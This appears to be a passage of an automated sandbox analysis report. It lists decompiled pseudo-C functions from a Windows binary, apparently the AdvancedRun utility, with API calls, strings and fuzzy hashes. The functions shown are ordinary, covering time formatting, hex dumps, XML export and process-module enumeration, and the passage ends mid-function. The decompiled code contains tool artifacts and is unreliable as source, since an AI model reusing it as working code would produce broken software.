                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                        • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                        • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                      • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                      • wcscpy.MSVCRT ref: 004037C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                      • String ID: L$cfg
                                                                                      • API String ID: 275899518-3734058911
                                                                                      • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                      • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                      • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                      0x00404ed0
                                                                                      0x00404edf
                                                                                      0x00404ef6
                                                                                      0x00000000
                                                                                      0x00404f00
                                                                                      0x00404f1c
                                                                                      0x00404f31
                                                                                      0x00404f41
                                                                                      0x00404f4e
                                                                                      0x00404f5d
                                                                                      0x00404f66
                                                                                      0x00404f69
                                                                                      0x00404f69
                                                                                      0x00404f71
                                                                                      0x00404f77
                                                                                      0x00404f7d

                                                                                      APIs
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                      • wcscpy.MSVCRT ref: 00404F41
                                                                                      • wcscat.MSVCRT ref: 00404F4E
                                                                                      • wcscat.MSVCRT ref: 00404F5D
                                                                                      • wcscpy.MSVCRT ref: 00404F71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1331804452-0
                                                                                      • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                      • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 71%
                                                                                      			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                      0x00404fe0
                                                                                      0x00404fe9
                                                                                      0x00405000
                                                                                      0x00405005
                                                                                      0x00405009
                                                                                      0x0040500c
                                                                                      0x0040500e
                                                                                      0x00405015
                                                                                      0x00405016
                                                                                      0x00405021
                                                                                      0x00405026
                                                                                      0x00405027
                                                                                      0x0040502c
                                                                                      0x00405031
                                                                                      0x00405039
                                                                                      0x0040503f
                                                                                      0x00405044
                                                                                      0x00405048
                                                                                      0x0040504e
                                                                                      0x00405056
                                                                                      0x0040505c
                                                                                      0x0040504e
                                                                                      0x00405065
                                                                                      0x0040506a
                                                                                      0x00405072
                                                                                      0x00405079

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2521778956-791839006
                                                                                      • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                      • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 42%
                                                                                      			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                      0x00407d9c
                                                                                      0x00407d9e
                                                                                      0x00407da5
                                                                                      0x00407db3
                                                                                      0x00407dba
                                                                                      0x00407dc5
                                                                                      0x00407dc7
                                                                                      0x00407dd0
                                                                                      0x00407dc9
                                                                                      0x00407dc9
                                                                                      0x00407dc9
                                                                                      0x00407dd8
                                                                                      0x00407de1
                                                                                      0x00407de5
                                                                                      0x00407deb
                                                                                      0x00407df2
                                                                                      0x00407df3
                                                                                      0x00407dfe
                                                                                      0x00407e03
                                                                                      0x00407e04
                                                                                      0x00407e21

                                                                                      APIs
                                                                                      Strings
                                                                                      • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                      • <%s>, xrefs: 00407DF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                      • API String ID: 3473751417-2880344631
                                                                                      • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                      • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 70%
                                                                                      			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                      0x00403b56
                                                                                      0x00403b5d
                                                                                      0x00403b6f
                                                                                      0x00403b76
                                                                                      0x00403b82
                                                                                      0x00403b8d
                                                                                      0x00403b8e
                                                                                      0x00403b99
                                                                                      0x00403b9e
                                                                                      0x00403b9f
                                                                                      0x00403ba7
                                                                                      0x00403bb9
                                                                                      0x00403bce
                                                                                      0x00403be5
                                                                                      0x00403bef
                                                                                      0x00403bf8
                                                                                      0x00403c00

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403B5D
                                                                                      • memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                        • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                        • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                        • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                      • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                      • API String ID: 1832587304-479876776
                                                                                      • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                      • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                      0x0040afd3
                                                                                      0x0040afe2
                                                                                      0x0040aff3
                                                                                      0x0040b002
                                                                                      0x0040b023
                                                                                      0x00000000
                                                                                      0x0040b047
                                                                                      0x0040b02e
                                                                                      0x0040b034
                                                                                      0x0040b03c
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • wcscpy.MSVCRT ref: 0040AFD3
                                                                                      • wcscat.MSVCRT ref: 0040AFE2
                                                                                      • wcscat.MSVCRT ref: 0040AFF3
                                                                                      • wcscat.MSVCRT ref: 0040B002
                                                                                      • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                        • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                      • String ID: \StringFileInfo\
                                                                                      • API String ID: 393120378-2245444037
                                                                                      • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                      • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscpy
                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                      • API String ID: 999028693-502967061
                                                                                      • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                      • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 38%
                                                                                      			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                      0x004092f3
                                                                                      0x004092fb
                                                                                      0x00409303
                                                                                      0x00409305
                                                                                      0x00409310
                                                                                      0x00409433
                                                                                      0x00409433
                                                                                      0x00409439
                                                                                      0x0040943f
                                                                                      0x00409445
                                                                                      0x0040944b
                                                                                      0x0040944e
                                                                                      0x00409452
                                                                                      0x00409466
                                                                                      0x0040946e
                                                                                      0x00409475
                                                                                      0x004094f7
                                                                                      0x004094f7
                                                                                      0x004094f9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409488
                                                                                      0x00409494
                                                                                      0x004094a5
                                                                                      0x004094a9
                                                                                      0x004094b5
                                                                                      0x004094c3
                                                                                      0x004094c6
                                                                                      0x004094d5
                                                                                      0x004094dc
                                                                                      0x004094e1
                                                                                      0x004094e3
                                                                                      0x004094f1
                                                                                      0x00000000
                                                                                      0x004094f1
                                                                                      0x00000000
                                                                                      0x004094e3
                                                                                      0x00000000
                                                                                      0x004094f7
                                                                                      0x00409452
                                                                                      0x00409316
                                                                                      0x00409316
                                                                                      0x0040931c
                                                                                      0x00000000
                                                                                      0x00409322
                                                                                      0x0040932b
                                                                                      0x00409333
                                                                                      0x00409337
                                                                                      0x00409341
                                                                                      0x00409342
                                                                                      0x0040934e
                                                                                      0x0040934f
                                                                                      0x00409358
                                                                                      0x0040935e
                                                                                      0x0040935e
                                                                                      0x00409363
                                                                                      0x0040936b
                                                                                      0x0040936d
                                                                                      0x00409377
                                                                                      0x00409385
                                                                                      0x0040938d
                                                                                      0x0040939d
                                                                                      0x004093a5
                                                                                      0x004093ac
                                                                                      0x004093b4
                                                                                      0x004093c5
                                                                                      0x004093c9
                                                                                      0x004093da
                                                                                      0x004093df
                                                                                      0x004093e5
                                                                                      0x004093e6
                                                                                      0x004093ea
                                                                                      0x004093f6
                                                                                      0x004093fc
                                                                                      0x00409407
                                                                                      0x00409407
                                                                                      0x0040941d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409423
                                                                                      0x00409428
                                                                                      0x00409375
                                                                                      0x00409375
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040942e
                                                                                      0x00000000
                                                                                      0x00409428
                                                                                      0x00409377
                                                                                      0x0040936d
                                                                                      0x004094fb
                                                                                      0x004094ff
                                                                                      0x004094ff
                                                                                      0x00409337
                                                                                      0x0040931c
                                                                                      0x0040950f

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                      • memset.MSVCRT ref: 0040938D
                                                                                      • memset.MSVCRT ref: 0040939D
                                                                                        • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                      • memset.MSVCRT ref: 00409488
                                                                                      • wcscpy.MSVCRT ref: 004094A9
                                                                                      • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3300951397-0
                                                                                      • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                      • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                      • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                      • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 44%
                                                                                      			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                      0x00402ed7
                                                                                      0x00402eee
                                                                                      0x00402ef8
                                                                                      0x00402f00
                                                                                      0x00402f01
                                                                                      0x00402f05
                                                                                      0x00402f0a
                                                                                      0x00402f1a
                                                                                      0x00402f30

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                      • String ID:
                                                                                      • API String ID: 19018683-0
                                                                                      • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                      • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                      • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                      • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 50%
                                                                                      			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
